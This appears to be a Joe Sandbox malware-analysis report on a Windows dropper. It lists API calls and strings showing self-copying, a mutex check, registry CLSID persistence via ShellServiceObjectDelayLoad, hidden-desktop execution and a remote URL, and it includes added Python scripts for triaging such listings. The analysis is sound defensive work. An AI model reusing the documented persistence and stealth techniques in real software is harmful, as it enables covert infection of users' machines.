                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmp
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB
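The "APIs" lines in the function listings above are the Joe Sandbox IDA plugin's per-function call list, and the arguments are raw stack values: 00020006 on RegCreateKeyExA is KEY_WRITE, 00020019 on RegOpenKeyExA is KEY_READ, C0000000 on CreateFileA is GENERIC_READ|GENERIC_WRITE, 00000080 is FILE_ATTRIBUTE_NORMAL, and 00000002 as the fourth SetFilePointer argument is FILE_END, so that function appends to a file. The following Python is an added triage example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly the format shown on this page, decodes those masks at the documented parameter positions (the plugin prints more stack slots than the API takes, so only the real positions are decoded), and tags each function with the behaviour its API combination indicates. The SAMPLE text is copied from the listings above; the DECODERS table and the tag wording are this example's own.

```python
import re

# Constructed sample: four 'APIs' blocks copied from the function listings on this page.
SAMPLE = """\
APIs
• FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
• _stricmp.CRTDLL(?,?), ref: 00405679
• FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00404341
• GetThreadDesktop.USER32(00000000), ref: 00404347
• CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
• SetThreadDesktop.USER32 ref: 00404394
APIs
• RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
• RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
• RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
APIs
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
• WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
• CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
"""

# One report line: optional 'Part of subcall function X:' prefix, API.MODULE(args), ref: address.
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]{8})\s*$"
)

KEY_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
           (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

# (parameter index, decoder) per API; indices follow the documented Win32 prototypes.
DECODERS = {
    "RegCreateKeyExA": (5, lambda v: KEY_RIGHTS.get(v, hex(v))),   # samDesired
    "RegOpenKeyExA":   (3, lambda v: KEY_RIGHTS.get(v, hex(v))),   # samDesired
    "CreateFileA":     (1, lambda v: "|".join(n for b, n in GENERIC if v & b) or hex(v)),
    "SetFilePointer":  (3, lambda v: MOVE_METHOD.get(v, hex(v))),  # dwMoveMethod
}

# API combinations and the behaviour they indicate (this example's own wording).
RULES = [
    ({"CreateDesktopA", "SetThreadDesktop"}, "runs code on a separate (invisible) desktop"),
    ({"FindFirstUrlCacheEntryA", "FindNextUrlCacheEntryA"}, "enumerates the WinINet URL cache"),
    ({"RegCreateKeyExA", "RegSetValueExA"}, "writes a registry value"),
    ({"CreateFileA", "SetFilePointer", "WriteFile"}, "writes to a file"),
]


def parse_api_listing(text):
    """Return one list per function; each entry is (api, module, args, ref).
    A line reading exactly 'APIs' starts a new function block, as in the report."""
    functions = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            functions.append([])
            continue
        m = LINE_RE.match(line)
        if not m or not functions:
            continue
        api, module, args, ref = m.groups()
        functions[-1].append((api, module, args.split(",") if args else [], ref))
    return functions


def decode_arg(api, args):
    """Decode the one flag/mask argument we know for this API, or None ('?' = unresolved)."""
    if api not in DECODERS:
        return None
    idx, decoder = DECODERS[api]
    if idx >= len(args) or not re.fullmatch(r"[0-9A-Fa-f]{8}", args[idx]):
        return None
    return decoder(int(args[idx], 16))


def tag_function(calls):
    apis = {c[0] for c in calls}
    tags = [label for needed, label in RULES if needed <= apis]
    decoded = {c[0]: decode_arg(c[0], c[2]) for c in calls}
    # A write after seeking to FILE_END is an append; refine the tag from the decoded value.
    if "writes to a file" in tags and decoded.get("SetFilePointer") == "FILE_END":
        tags[tags.index("writes to a file")] = "appends to a file"
    return tags, {k: v for k, v in decoded.items() if v}


def triage(text):
    report = []
    for calls in parse_api_listing(text):
        tags, decoded = tag_function(calls)
        report.append({"first_ref": calls[0][3] if calls else None,
                       "apis": [c[0] for c in calls], "tags": tags, "decoded": decoded})
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry["first_ref"], entry["tags"], entry["decoded"])
```

The unresolved "?" slots stay undecoded on purpose: the plugin could not recover those values from the dump, and guessing a creation disposition or key path from a neighbouring slot would be wrong more often than right.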

                            Execution Graph

                            Execution Coverage: 5.4%
                            Dynamic/Decrypted Code Coverage: 0%
                            Signature Coverage: 0%
                            Total number of Nodes: 542
                            Total number of Limit Nodes: 2
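The execution_graph listing that follows is the plugin's graph serialised as one flat token stream: a node is an id followed by a function or block address and zero or more API names (or "N API calls" where a subcall was collapsed), and an "id->id" token is an edge. It is unreadable as text but trivial to parse, and the edges answer the question a triager actually has, which is what path leads to a given API. The Python below is an added example, not part of the Joe Sandbox report: it parses two slices copied verbatim from the listing below and recovers the shortest path from each entry node to every node that calls CreateProcessA. In this graph that path runs through 40431f, the block that calls GetThreadDesktop, CreateDesktopA and SetThreadDesktop, before reaching CreateProcessA at 40537c, so the desktop switch precedes the process launch on this code path. The token grammar is inferred from the listing as it appears here.

```python
import re
from collections import deque

# Constructed sample: two slices copied verbatim from the execution_graph listing on this page.
SAMPLE_GRAPH = (
    "execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf "
    "2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat "
    "strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA "
    "2720->2721 2722 4053ac CloseHandle sprintf 2721->2722 2732 405469 2721->2732 "
    "2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2725 4054d0 2723->2725 "
    "2724 405413 2722->2724 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 "
    "2726->2727 2728 405402 Sleep 2726->2728 2729 405421 Sleep 2727->2729 2727->2732 "
    "2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 "
    "2730->2731 2731->2732 2732->2723 2734 404341 GetCurrentThreadId GetThreadDesktop "
    "2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop "
    "2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 "
    "2737->2720 2737->2721 "
    "2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 "
    "2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{6}$")


def parse_execution_graph(text):
    """Tokenise the listing into nodes {id: {'addr', 'label'}} plus successor and
    predecessor maps.  Grammar as observed on this page: '<id> <hex address>' opens a
    node, following tokens until the next node or edge are its label, and
    '<id>-><id>' is an edge.  Lists keep listing order so searches are deterministic."""
    tokens = text.split()
    nodes, succ, pred = {}, {}, {}
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            src, dst = edge.groups()
            succ.setdefault(src, []).append(dst)
            pred.setdefault(dst, []).append(src)
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": ""}
            i += 1  # the address token is consumed with the id
        elif current is not None:
            nodes[current]["label"] = (nodes[current]["label"] + " " + tok).strip()
        i += 1
    return nodes, succ, pred


def shortest_path(succ, start, goal):
    """Breadth-first search over successors; returns the id path or None."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            path = []
            while cur is not None:
                path.append(cur)
                cur = parent[cur]
            return path[::-1]
        for nxt in succ.get(cur, []):
            if nxt not in parent:
                parent[nxt] = cur
                queue.append(nxt)
    return None


def call_chains_to(api, text):
    """For every node whose label names `api`, the shortest path from each entry node
    (a node with no predecessors) that reaches it, as (address, label) pairs."""
    nodes, succ, pred = parse_execution_graph(text)
    targets = [nid for nid, n in nodes.items() if api in n["label"].split()]
    roots = [nid for nid in nodes if nid not in pred]
    chains = []
    for target in targets:
        for root in roots:
            path = shortest_path(succ, root, target)
            if path:
                chains.append([(nodes[n]["addr"], nodes[n]["label"]) for n in path])
    return chains


if __name__ == "__main__":
    for chain in call_chains_to("CreateProcessA", SAMPLE_GRAPH):
        print(" -> ".join(f"{addr} {label}".strip() for addr, label in chain))
```

Running it on the full listing instead of the two slices only requires pasting the whole execution_graph text into SAMPLE_GRAPH; the graph contains loops (for example 2710->2708 above), which the visited-set in the search handles.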
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 4053ac CloseHandle sprintf 2721->2722 2732 405469 2721->2732 2724 405413 2722->2724 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2729 405421 Sleep 2727->2729 2727->2732 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2732 2732->2723 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 4078fe CallWindowProcA 2748->2753 2755 407910 2748->2755 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2754 407885 SetFocus 2752->2754 2753->2755 2754->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 
2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2863 405e1b Sleep GetWindowTextA 2861->2863 2862->2861 2864 405df8 Sleep 2862->2864 2865 405e50 2863->2865 2864->2860 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 2915->2916 2917 
                            Control-flow graph edge list (numeric node ids, basic-block addresses such as 405a20, 403619 and 406c29, and the APIs called in each block, e.g. sprintf, rand, CreateFileA, RegCreateKeyExA, OpenMutexA); this was rendered as a graph image in the original report and the raw edge dump is not reproduced here.

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Oglabl32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Oglabl32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-152415183
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
